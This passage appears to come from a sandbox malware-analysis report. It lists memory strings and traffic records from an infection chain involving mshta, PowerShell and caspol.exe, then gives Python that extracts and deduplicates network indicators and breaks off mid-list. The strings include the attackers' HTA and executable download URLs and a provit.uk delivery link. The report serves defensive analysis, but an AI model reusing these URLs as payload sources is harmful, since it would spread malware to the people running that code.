                    Source: mshta.exe, 00000004.00000003.430428593.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430980490.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.431523218.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506346159.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.511914905.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta..
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta38
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta=8
                    Source: mshta.exe, 00000004.00000002.432158239.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.511914905.0000000000240000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506346159.0000000000240000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506294361.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.504008484.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512306912.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.0000000000240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaC:
                    Source: mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaHf
                    Source: mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaV8
                    Source: mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaZf
                    Source: mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htadf
                    Source: mshta.exe, 00000004.00000003.431264903.00000000034D5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510361814.0000000002C25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506573800.0000000002C25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaht
                    Source: mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htavf
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: mshta.exe, 0000001D.00000003.511761813.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.n?
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003D37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: powershell.exe, 00000005.00000002.454706317.0000000003632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511761813.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: powershell.exe, 00000005.00000002.454706317.0000000002271000.00000004.00000800.00020000.00000000.sdmp, caspol.exe, 0000000B.00000002.470705091.0000000002361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.0000000002181000.00000004.00000800.00020000.00000000.sdmp, caspol.exe, 00000025.00000002.532965241.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: rrwscqkDSNwLK.exe, 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namep5W
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: rrwscqkDSNwLK.exe, rrwscqkDSNwLK.exe, 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, caspol.exe, 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                    Source: powershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000005.00000002.468386481.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.0000000000290000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.511914905.0000000000290000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506346159.0000000000290000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/
                    Source: mshta.exe, 00000004.00000003.430980490.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430428593.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.431523218.0000000000512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/:
                    Source: mshta.exe, 0000001D.00000003.510915090.0000000000240000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.xls, CA430000.0.drString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion
                    Source: mshta.exe, 00000004.00000003.430428593.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430980490.00000000004C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion/k
                    Source: mshta.exe, 00000004.00000002.431523218.000000000049A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion0k
                    Source: mshta.exe, 0000001D.00000003.506346159.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.000000000022C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion2
                    Source: mshta.exe, 0000001D.00000002.511914905.00000000001DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion?
                    Source: mshta.exe, 00000004.00000002.432158239.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionk.hta
                    Source: mshta.exe, 00000004.00000003.430640416.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430428593.0000000000512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionket
                    Source: mshta.exe, 0000001D.00000003.506346159.0000000000240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionvc
                    Source: mshta.exe, 00000004.00000003.430980490.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430428593.0000000000512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.431523218.0000000000512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/J
                    Source: mshta.exe, 0000001D.00000003.511689770.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://provit.uk/~
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49165 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49180 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49179 version: TLS 1.2
                    Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
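                    The memory-string hits above show the usual carving artifacts: the same URL turns up with adjacent bytes glued on (caspol.exe6, caspol.exep, .hta38, .htaC:) or cut short (caspol.e), and the certificate URLs carry a DER length byte (ocsp.comodoca.com0). The following Python is an added example, not part of the Joe Sandbox report, that parses lines in this report's format, attributes each URL to the processes and files it was carved from, and collapses each variant onto an observed sibling instead of guessing a clean URL. The clustering thresholds (MAX_JUNK, MAX_TAIL) and the neighbour-counting rule are the editor's heuristics; the sample lines are copied from the entries above with their source lists shortened to one memory dump each.

```python
"""Extract and de-duplicate network IOCs from Joe Sandbox "String found in binary or
memory" and "HTTPS traffic detected" lines. Variants are collapsed only onto strings
the sandbox actually observed, so no URL is invented that is not in the report."""
import re
from collections import defaultdict

MAX_JUNK = 2   # length difference tolerated when clustering near-identical variants
MAX_TAIL = 8   # longer slash-free tails are folded onto an already-confirmed base URL

LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.*?)"
    r"(?P<kind>String found in binary or memory|HTTPS traffic detected|"
    r"Network traffic detected|HTTP traffic detected):\s*(?P<val>.*)$"
)
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# memory-dump ids look like 00000004.00000003.430626132.00000000042B9000....sdmp;
# dropped-file ids such as CA430000.0.dr are kept because they name an artifact
DUMP_RE = re.compile(r"^[0-9A-F]{8}\.[0-9A-F]{8}\.")
TLS_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}):(\d+) -> (\d{1,3}(?:\.\d{1,3}){3}):(\d+)")


def parse_line(line):
    """Split one report line into (kind, [source artifacts], value); None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    sources = [t.strip() for t in m["src"].split(",")]
    sources = [t for t in sources if t and t != "unknown" and not DUMP_RE.match(t)]
    return m["kind"], sources, m["val"]


def _neighbours(cand, cands):
    return {p for p in cands
            if (p.startswith(cand) or cand.startswith(p)) and abs(len(p) - len(cand)) <= MAX_JUNK}


def canonicalize(cands):
    """Map every observed URL string to the observed variant it is most likely a copy of."""
    cands = set(cands)
    score = {c: len(_neighbours(c, cands)) for c in cands}
    # within each string's neighbourhood pick the variant with the most siblings;
    # ties go to the shorter string, since trailing junk is more common than truncation
    canon = {c: max(_neighbours(c, cands), key=lambda p: (score[p], -len(p), p)) for c in cands}
    bases = sorted({p for p in canon.values() if score[p] >= 3}, key=len, reverse=True)
    for c, p in list(canon.items()):
        if p in bases:
            continue
        for b in bases:   # longest base first, so the most specific URL wins
            tail = c[len(b):]
            if c.startswith(b) and 0 < len(tail) <= MAX_TAIL and "/" not in tail:
                canon[c] = b
                break
    return canon


def extract_iocs(lines):
    """Return {'urls': {canonical_url: [sources]}, 'tls_servers': [(ip, port)]}."""
    url_sources, tls_servers = defaultdict(set), set()
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        kind, sources, value = parsed
        if kind == "String found in binary or memory":
            for url in URL_RE.findall(value):
                url_sources[url].update(sources)
        elif kind == "HTTPS traffic detected":
            m = TLS_RE.search(value)
            if m:
                tls_servers.add((m[1], int(m[2])))   # server side of "server -> client"
    canon = canonicalize(url_sources)
    merged = defaultdict(set)
    for url, sources in url_sources.items():
        merged[canon[url]].update(sources)
    return {"urls": {u: sorted(s) for u, s in sorted(merged.items())},
            "tls_servers": sorted(tls_servers)}


# Lines copied from the report above; source lists shortened to one memory dump each.
HTA = "http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta"
PHISH = "https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion"
M4 = "mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp"
M1D = "mshta.exe, 0000001D.00000003.510915090.0000000000240000.00000004.00000020.00020000.00000000.sdmp"
PS = "powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmp"
S = "String found in binary or memory: "
REPORT_LINES = [
    f"Source: {M4}{S}http://192.3.243.136/",
    f"Source: {PS}{S}http://192.3.243.136/55/caspol.e",
    f"Source: {PS}{S}http://192.3.243.136/55/caspol.exe",
    f"Source: {PS}{S}http://192.3.243.136/55/caspol.exe6",
    f"Source: {PS}{S}http://192.3.243.136/55/caspol.exep",
    f"Source: {M1D}{S}{HTA}", f"Source: {M1D}{S}{HTA}$1",
    f"Source: {M4}{S}{HTA}38", f"Source: {M4}{S}{HTA}C:",
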